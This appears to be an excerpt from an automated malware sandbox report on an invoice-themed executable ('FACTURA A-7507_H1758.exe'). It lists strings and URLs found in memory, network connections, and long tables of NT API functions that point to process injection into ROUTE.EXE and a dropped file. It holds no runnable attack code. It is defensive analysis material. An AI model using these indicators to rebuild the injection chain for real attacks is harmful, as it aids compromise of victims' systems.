    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hostinger.com
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26333035118.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp, plot-im.jpg.0.dr, nsr3F9E.tmp.0.drString found in binary or memory: https://www.istockphoto.com/photo/license-gm618184124-?utm_medium=organic&amp;utm_source=google&amp;
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_la
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_l
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_land
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lichnyyrost.online&amp;reg_source=parking_auto
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownHTTPS traffic detected: 142.250.80.110:443 -> 192.168.11.20:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49791 version: TLS 1.2
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354734E0 NtCreateMutant,LdrInitializeThunk,2_2_354734E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_35472D10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_35472B90
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35473C30 NtOpenProcessToken,2_2_35473C30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35473C90 NtOpenThread,2_2_35473C90
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354738D0 NtGetContextThread,2_2_354738D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35474570 NtSuspendThread,2_2_35474570
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35474260 NtSetContextThread,2_2_35474260
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472D50 NtWriteVirtualMemory,2_2_35472D50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472DC0 NtAdjustPrivilegesToken,2_2_35472DC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472DA0 NtReadVirtualMemory,2_2_35472DA0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C50 NtUnmapViewOfSection,2_2_35472C50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C10 NtOpenProcess,2_2_35472C10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C20 NtSetInformationFile,2_2_35472C20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C30 NtMapViewOfSection,2_2_35472C30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472CD0 NtEnumerateKey,2_2_35472CD0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472CF0 NtDelayExecution,2_2_35472CF0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472F00 NtCreateFile,2_2_35472F00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472F30 NtOpenDirectoryObject,2_2_35472F30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472FB0 NtSetValueKey,2_2_35472FB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E50 NtCreateSection,2_2_35472E50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E00 NtQueueApcThread,2_2_35472E00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472EC0 NtQuerySection,2_2_35472EC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472ED0 NtResumeThread,2_2_35472ED0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E80 NtCreateProcessEx,2_2_35472E80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472EB0 NtProtectVirtualMemory,2_2_35472EB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354729D0 NtWaitForSingleObject,2_2_354729D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354729F0 NtReadFile,2_2_354729F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B00 NtQueryValueKey,2_2_35472B00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B10 NtAllocateVirtualMemory,2_2_35472B10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B20 NtQueryInformationProcess,2_2_35472B20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472BC0 NtQueryInformationToken,2_2_35472BC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472BE0 NtQueryVirtualMemory,2_2_35472BE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B80 NtCreateKey,2_2_35472B80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472A10 NtWriteFile,2_2_35472A10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472AC0 NtEnumerateValueKey,2_2_35472AC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472A80 NtClose,2_2_35472A80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472AA0 NtQueryInformationFile,2_2_35472AA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A4260 NtSetContextThread,LdrInitializeThunk,4_2_034A4260
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A4570 NtSuspendThread,LdrInitializeThunk,4_2_034A4570
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B00 NtQueryValueKey,LdrInitializeThunk,4_2_034A2B00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034A2B10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_034A2BC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B80 NtCreateKey,LdrInitializeThunk,4_2_034A2B80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034A2B90
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2A10 NtWriteFile,LdrInitializeThunk,4_2_034A2A10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034A2AC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2A80 NtClose,LdrInitializeThunk,4_2_034A2A80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A29F0 NtReadFile,LdrInitializeThunk,4_2_034A29F0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2F00 NtCreateFile,LdrInitializeThunk,4_2_034A2F00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E50 NtCreateSection,LdrInitializeThunk,4_2_034A2E50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E00 NtQueueApcThread,LdrInitializeThunk,4_2_034A2E00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2ED0 NtResumeThread,LdrInitializeThunk,4_2_034A2ED0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_034A2D10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_034A2DA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034A2C50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_034A2C30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2CF0 NtDelayExecution,LdrInitializeThunk,4_2_034A2CF0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A34E0 NtCreateMutant,LdrInitializeThunk,4_2_034A34E0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A38D0 NtGetContextThread,LdrInitializeThunk,4_2_034A38D0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B20 NtQueryInformationProcess,4_2_034A2B20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2BE0 NtQueryVirtualMemory,4_2_034A2BE0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2AA0 NtQueryInformationFile,4_2_034A2AA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A29D0 NtWaitForSingleObject,4_2_034A29D0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2F30 NtOpenDirectoryObject,4_2_034A2F30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2FB0 NtSetValueKey,4_2_034A2FB0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2EC0 NtQuerySection,4_2_034A2EC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E80 NtCreateProcessEx,4_2_034A2E80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2EB0 NtProtectVirtualMemory,4_2_034A2EB0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2D50 NtWriteVirtualMemory,4_2_034A2D50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2DC0 NtAdjustPrivilegesToken,4_2_034A2DC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C10 NtOpenProcess,4_2_034A2C10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C20 NtSetInformationFile,4_2_034A2C20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2CD0 NtEnumerateKey,4_2_034A2CD0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A3C30 NtOpenProcessToken,4_2_034A3C30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A3C90 NtOpenThread,4_2_034A3C90
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F061 NtQueryInformationProcess,NtReadVirtualMemory,4_2_0331F061
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F6D8 NtMapViewOfSection,4_2_0331F6D8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FB94 NtResumeThread,4_2_0331FB94
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FBF8 NtResumeThread,4_2_0331FBF8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FA78 NtResumeThread,4_2_0331FA78
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F948 NtMapViewOfSection,4_2_0331F948
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F891 NtMapViewOfSection,4_2_0331F891
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_00404C590_2_00404C59
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004068460_2_00406846
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FF5C92_2_354FF5C9
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F75C62_2_354F75C6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD4802_2_354AD480
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354ED6462_2_354ED646
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DD62C2_2_354DD62C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B36EC2_2_354B36EC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FF6F62_2_354FF6F6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3548717A2_2_3548717A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F1132_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DD1302_2_354DD130
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354451C02_2_354451C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E02_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544B0D02_2_3544B0D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F70F12_2_354F70F1
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3547508C2_2_3547508C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FF3302_2_354FF330
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354313802_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D2EC2_2_3542D2EC
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F7D4C2_2_354F7D4C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FFD272_2_354FFD27
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35449DD02_2_35449DD0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DFDF42_2_354DFDF4
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35443C602_2_35443C60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C7CE82_2_354C7CE8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545FCE02_2_3545FCE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9C982_2_354D9C98
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35401C9F2_2_35401C9F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BFF402_2_354BFF40
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FFF632_2_354FFF63
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F1FC62_2_354F1FC6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F9ED22_2_354F9ED2
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35441EB22_2_35441EB2
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354859C02_2_354859C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354099E82_2_354099E8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354498702_2_35449870
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B8702_2_3545B870
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B58702_2_354B5870
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FF8722_2_354FF872
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354438002_2_35443800
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F18DA2_2_354F18DA
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F78F32_2_354F78F3
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B98B22_2_354B98B2
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3547DB192_2_3547DB19
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FFB2E2_2_354FFB2E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FFA892_2_354FFA89
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545FAA02_2_3545FAA0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550A5262_2_3550A526
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354404452_2_35440445
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F67572_2_354F6757
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544A7602_2_3544A760
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354427602_2_35442760
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354646702_2_35464670
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545C6002_2_3545C600
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FA6C02_2_354FA6C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354406802_2_35440680
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550010E2_2_3550010E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EE0762_2_354EE076
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354300A02_2_354300A0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544E3102_2_3544E310
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354022452_2_35402245
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35440D692_2_35440D69
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543AD002_2_3543AD00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35452DB02_2_35452DB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EEC4C2_2_354EEC4C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F6C692_2_354F6C69
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FEC602_2_354FEC60
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35430C122_2_35430C12
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544AC202_2_3544AC20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354BEC202_2_354BEC20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35458CDF2_2_35458CDF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550ACEB2_2_3550ACEB
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544CF002_2_3544CF00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35446FE02_2_35446FE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FEFBF2_2_354FEFBF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35482E482_2_35482E48
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35460E502_2_35460E50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E0E6D2_2_354E0E6D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35432EE82_2_35432EE8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F0EAD2_2_354F0EAD
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543E9A02_2_3543E9A0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FE9A62_2_354FE9A6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354268682_2_35426868
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546E8102_2_3546E810
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354E08352_2_354E0835
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354428C02_2_354428C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354568822_2_35456882
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35440B102_2_35440B10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B4BC02_2_354B4BC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FEA5B2_2_354FEA5B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354FCA132_2_354FCA13
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A57A4B3_2_03A57A4B
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A59A223_2_03A59A22
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A6016E3_2_03A6016E
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A601723_2_03A60172
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A598023_2_03A59802
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A597FC3_2_03A597FC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exeCode function: 3_2_03A785123_2_03A78512
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0347E3104_2_0347E310
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034322454_2_03432245
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0353010E4_2_0353010E
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0351E0764_2_0351E076
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034600A04_2_034600A0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035267574_2_03526757
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034727604_2_03472760
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0347A7604_2_0347A760
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034946704_2_03494670
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0348C6004_2_0348C600
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352A6C04_2_0352A6C0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034706804_2_03470680
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0353A5264_2_0353A526
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034704454_2_03470445
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_03470B104_2_03470B10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034E4BC04_2_034E4BC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352EA5B4_2_0352EA5B
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352CA134_2_0352CA13
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0346E9A04_2_0346E9A0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0352E9A64_2_0352E9A6
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034568684_2_03456868
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0349E8104_2_0349E810
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_035108354_2_03510835
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034728C04_2_034728C0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034868824_2_03486882
